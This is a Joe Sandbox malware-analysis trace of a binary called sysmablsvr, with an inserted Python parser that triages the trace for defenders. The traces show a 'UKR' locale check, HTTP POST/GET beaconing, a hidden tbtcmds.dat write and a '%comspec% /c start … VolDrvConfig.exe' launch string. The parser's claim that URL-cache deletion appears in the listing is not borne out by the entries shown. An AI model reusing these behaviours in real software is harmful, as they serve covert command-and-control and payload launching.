                                              • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406571
                                              • lstrcmpW.KERNEL32(?,00410FCC), ref: 00406587
                                              • wsprintfW.USER32 ref: 004065AA
                                              • wsprintfW.USER32 ref: 004065CA
                                              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                              • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                              • FindClose.KERNEL32(000000FF), ref: 0040662F
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                              • String ID: %s\%s$%s\%s$%s\*
                                              • API String ID: 92872011-445461498
                                              • Opcode ID: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction ID: 29a521c4e1aad10613397e171bad1bd73fe874f8ff332ca0de340875b50b0acb
                                              • Instruction Fuzzy Hash: 56315BB5500218AFCB10DB60EC85FDA7778AB48701F40C5A9F609A3185DBB5DAD9CF68
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040ECD3
                                              • strcmp.NTDLL ref: 0040ECE2
                                              • API ID: InfoLocalestrcmp
                                              • String ID: UKR
                                              • API String ID: 3191669094-64918367
                                              • Opcode ID: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction ID: 77034b4ee665358b2559d06917653f26683f777e377fe2659d333d0cc479d80c
                                              • Instruction Fuzzy Hash: 19E02B32E4830876FA10BAA5AC03FEA375C9711701F000176FF05F21C1F6BA922A979B
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040192C
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                              • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                              • accept.WS2_32(?,?,?), ref: 004019A8
                                              • GetTickCount.KERNEL32 ref: 004019F6
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                              • GetTickCount.KERNEL32 ref: 00401A43
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                              • GetTickCount.KERNEL32 ref: 00401AAB
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                              • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                              • String ID: PCOI$ilci
                                              • API String ID: 3345448188-3762367603
                                              • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction ID: 052bb906b72d623838b809fd2f084fe798b134d15a2779f83897d066d1444b79
                                              • Instruction Fuzzy Hash: 3441F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99
                                              APIs
                                              • memset.NTDLL ref: 0040EAA8
                                              • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EAF8
                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EB0B
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EB44
                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EB7A
                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EBA5
                                              • HttpSendRequestA.WININET(00000000,004120C8,000000FF,00009E34), ref: 0040EBCF
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EC0E
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040EC60
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC91
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC9E
                                              • InternetCloseHandle.WININET(00000000), ref: 0040ECAB
                                              • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                              • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                              • API String ID: 2761394606-2217117414
                                              • Opcode ID: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction ID: c905a0693736bdbf34c7f8e0e7db626079e62ceb693e66bb4324beed71749724
                                              • Instruction Fuzzy Hash: 33514CB5901228ABDB26CF54CC94BDDB7BCAB48705F0481E9B60DA6280C7B96FC4CF54
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                              • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                              • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                              • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                              • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                              • WSACloseEvent.WS2_32(?), ref: 00401715
                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                              • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                              • String ID: PCOI$ilci
                                              • API String ID: 2403999931-3762367603
                                              • Opcode ID: 7df5625406d7924a9ef55977e1bd28806cadd22570a056913c37e6fa8f7b7583
                                              • Instruction ID: 5b8540bf1bb466d15bf787bf2847de779fcfe5b3cc035b7f1a74ac98c73710f1
                                              • Instruction Fuzzy Hash: D731A875900705ABC710EF70EC48B97B7B8BF08710F048A2AF559A3691C779F894CB98
                                              APIs
                                              • memset.NTDLL ref: 0040E178
                                              • InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040E30A
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E347
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E354
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E361
                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                              • String ID: <$GET
                                              • API String ID: 1205665004-427699995
                                              • Opcode ID: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction ID: 0e0ad4ad31c216dc2eff2ccec99c89ab6a28dd79d12b38366d41975b782ec3ac
                                              • Instruction Fuzzy Hash: 6E511BB5901228ABDB36CB50CC55BE9B7BCAB44705F0444E9A60DAA2C0D7B96BC4CF54
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,00000000,0040BE82,006A0266,?,0040BE9E,00000000,0040D17C,?), ref: 0040600F
                                              • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                              • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                              • LeaveCriticalSection.KERNEL32(004174D8,?,?,?,?,?,?,0040BE9E,00000000,0040D17C,?), ref: 00406248
                                              Strings
                                              • C:\Users\user\tbtcmds.dat, xrefs: 004061C0
                                              • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                              • String ID: C:\Users\user\tbtcmds.dat
                                              • API String ID: 1457358591-1042172597
                                              • Opcode ID: fc3fbd14c8c4e913f040ec335e7850d4c7a20847d82a3d6e72c5a2ff44c735bb
                                              • Instruction ID: d2a8f2c597d4f808d2c136561af7b6c80c21d69a530c7dbbc8373d1e9f004416
                                              • Opcode Fuzzy Hash: fc3fbd14c8c4e913f040ec335e7850d4c7a20847d82a3d6e72c5a2ff44c735bb
                                              • Instruction Fuzzy Hash: 6071E0B4E042099BCB04CF98D981FEFBBB1BB48304F14816DE505BB382D779A951CBA5
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                              • setsockopt.WS2_32 ref: 00401F2C
                                              • closesocket.WS2_32(?), ref: 00401F39
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                              • String ID:
                                              • API String ID: 671207744-0
                                              • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction ID: 8c1e587a25cfc232de2ab0883eb36e20e47ed0b1207a5ae34e006e610dd4584e
                                              • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction Fuzzy Hash: F2519F75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction ID: 498a00270a4ac3f3e732f182914c0c13a71c1caacf2de73c52121c1bdff13e9d
                                              • Opcode Fuzzy Hash: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction Fuzzy Hash: D5412E74A0020AEFDB04DF95C884FAFB7B9BF48304F108969E515A7390D778AE85CB95
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction ID: f37cc5fa491f806f20af1ba12fe7b13e6bb3fdd54c67fa744f8c06207b50935d
                                              • Opcode Fuzzy Hash: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction Fuzzy Hash: D1412DB5A0020ADFCB14DF99C884BAFB7B9BF48304F108569E515B7390D778AE85CB94
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: 5fdc0146492539df05ccd50cd035e90a966d871b42942f97a700882ce693defd
                                              • Instruction ID: 6ff3262b9ae864165baf17eb68ae52fc582ecffe48c2a7281556c95dbf3b24cf
                                              • Opcode Fuzzy Hash: 5fdc0146492539df05ccd50cd035e90a966d871b42942f97a700882ce693defd
                                              • Instruction Fuzzy Hash: 8C31E172200215ABC710AFB5ED8CAD7B7A8FF54324F00463EF55AD3280DB79A8448B99
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040640B
                                              • CoCreateInstance.OLE32(00412A48,00000000,00000001,00412A28,?), ref: 00406423
                                              • wsprintfW.USER32 ref: 00406456
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInitializeInstancewsprintf
                                              • String ID: %comspec%$/c start %s & start %s\VolDrvConfig.exe$Gh@
                                              • API String ID: 2038452267-1238916929
                                              • Opcode ID: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction ID: 7d2455aabe9eb384640674d95cb3f7402ea72c7f03b095a020dcafb7bbec31f6
                                              • Opcode Fuzzy Hash: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction Fuzzy Hash: 8E31C975A40208EFCB04DF98D885EDEB7B5EF88704F108199F519A73A5CA74AE81CB54
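The per-function entries above are the sandbox's raw API traces; turning them into triage signals means parsing the call lines, decoding the numeric arguments and matching call/string combinations. The Python below is an added example written for this page, not code from Joe Sandbox or from the analysed sample: it parses entries in this listing format (call lines, inlined "Part of subcall" lines, the Strings section and the "String ID" field), decodes the hex CreateFileW arguments the sandbox recorded using the documented Win32 values (0x40000000 GENERIC_WRITE, disposition 2 CREATE_ALWAYS, attribute 0x2 FILE_ATTRIBUTE_HIDDEN), and flags the hidden file write to tbtcmds.dat, the %comspec% command-line construction and the URL-cache deletion seen in the entries on this page. SAMPLE_REPORT is a constructed excerpt in the report's format that reuses call lines shown on this page; the triage rules and all function and field names are the example's own, not sandbox signatures.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Win32 constants used to decode the recorded CreateFileW arguments (hex, as the sandbox prints them).
GENERIC_WRITE = 0x40000000
CREATE_ALWAYS = 0x2
FILE_ATTRIBUTE_HIDDEN = 0x2

# "• Api.MODULE(args), ref: ADDR"; the argument list and the "Part of subcall" prefix are optional.
_CALL = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[\w.]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• <string>, xrefs: ADDR" under Strings, and "• String ID: a$b$c" under Similarity.
_STRING = re.compile(r"^\s*•\s*(?P<value>.+?),\s*xrefs:\s*[0-9A-Fa-f]+\s*$")
_STRING_ID = re.compile(r"^\s*•\s*String ID:\s*(?P<values>.*)$")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    via_subcall: Optional[str] = None  # callee address when the report inlined a subcall's APIs


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_report(text: str) -> List[Function]:
    """Each 'APIs' header starts a function; collect its call lines and the strings tied to it."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Function()
            functions.append(current)
            continue
        if current is None:
            continue
        if m := _CALL.match(line):
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            current.calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref"), m.group("parent")))
        elif m := _STRING_ID.match(line):
            current.strings.extend(s for s in m.group("values").split("$") if s)
        elif m := _STRING.match(line):
            current.strings.append(m.group("value"))
    return functions


def createfile_flags(call: Call) -> Optional[dict]:
    """Decode CreateFileW(path, access, share, sa, disposition, flags, template); '?' is unresolved."""
    if call.api != "CreateFileW" or len(call.args) < 6:
        return None
    num = lambda s: 0 if s == "?" else int(s, 16)
    return {
        "path": call.args[0],
        "generic_write": bool(num(call.args[1]) & GENERIC_WRITE),
        "create_always": num(call.args[4]) == CREATE_ALWAYS,
        "hidden": bool(num(call.args[5]) & FILE_ATTRIBUTE_HIDDEN),
    }


def triage(fn: Function) -> List[str]:
    """Behaviour flags for one function; the rules are this example's, not the sandbox's signatures."""
    findings, apis = [], {c.api for c in fn.calls}
    for call in fn.calls:
        info = createfile_flags(call)
        if info and info["generic_write"] and "WriteFile" in apis:
            findings.append(f"writes {'hidden ' if info['hidden'] else ''}file {info['path']}")
    if "wsprintfW" in apis and any("%comspec%" in s.lower() for s in fn.strings):
        findings.append("builds a command line through %comspec%")
    if "DeleteUrlCacheEntry" in apis:
        findings.append("deletes WinINet URL cache entries")
    return findings


def triage_report(text: str) -> List[tuple]:
    """(address of the function's first recorded call, findings) for every function that fired a rule."""
    return [(fn.calls[0].ref, hits) for fn in parse_report(text) if (hits := triage(fn))]


# Constructed excerpt in the report's listing format; the call lines are ones the sandbox printed.
SAMPLE_REPORT = r"""
APIs
• CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
• CloseHandle.KERNEL32(000000FF), ref: 0040623D
Strings
• C:\Users\user\tbtcmds.dat, xrefs: 004061C0
APIs
• CoInitialize.OLE32(00000000), ref: 0040640B
• CoCreateInstance.OLE32(00412A48,00000000,00000001,00412A28,?), ref: 00406423
• wsprintfW.USER32 ref: 00406456
Similarity
• API ID: CreateInitializeInstancewsprintf
• String ID: %comspec%$/c start %s & start %s\VolDrvConfig.exe$Gh@
APIs
• DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
• Sleep.KERNEL32(000003E8), ref: 00407361
  • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
"""
```

Calling `triage_report(SAMPLE_REPORT)` yields one tuple per function that fired a rule, keyed by the address of its first recorded call, which is how you would join the findings back to the entries in this listing. Decoding the CreateFileW arguments is the part worth copying: the sandbox prints the raw hex, and the attribute value 2 on the tbtcmds.dat call is what tells you the dropped file is created hidden, a detail the API name alone does not show.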
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction ID: 0db10e415d6a1e8faee94fa1aa357f29b7cea0d9451b7bd8199af60d13ceb70c
                                              • Opcode Fuzzy Hash: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction Fuzzy Hash: 98312AB5E0020ADFCB14DF99D884BAFB7B5BF88304F108569E514B7390D778AA81CB94
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction ID: f860d819dcfac7245c0065b1f48ab1f28a181454cf029f87bdd60df825f867a0
                                              • Opcode Fuzzy Hash: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction Fuzzy Hash: B9311D74A0020A9FCB04CF99D884FEFB7B5BF88304F148969E514B7390D778AA85CB95
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl_aullshr
                                              • String ID:
                                              • API String ID: 673498613-0
                                              • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction ID: c7f26e6fe3f6e47823c68d9e93f939c843ab0f3ebbce24f5146439a699fa7f9b
                                              • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction Fuzzy Hash: CC114F326005186B8B10EF9EC44269ABBD6EF84360B15C136FC2CCF319D634D9414BD4
                                              APIs
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                              • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                              • String ID:
                                              • API String ID: 3966618661-0
                                              • Opcode ID: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction ID: 36d18bb318df5a029dedd03b2acd005dba350197efc47ce95ae0e9b03ff24c88
                                              • Opcode Fuzzy Hash: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction Fuzzy Hash: 7241A175604A01ABC714EB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                               • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl
                                              • String ID:
                                              • API String ID: 435966717-0
                                              • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                              • Instruction ID: 6393123168de4f4826dca7712cb04f948d5e4027293efa58ed578d500b7b4a08
                                              • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
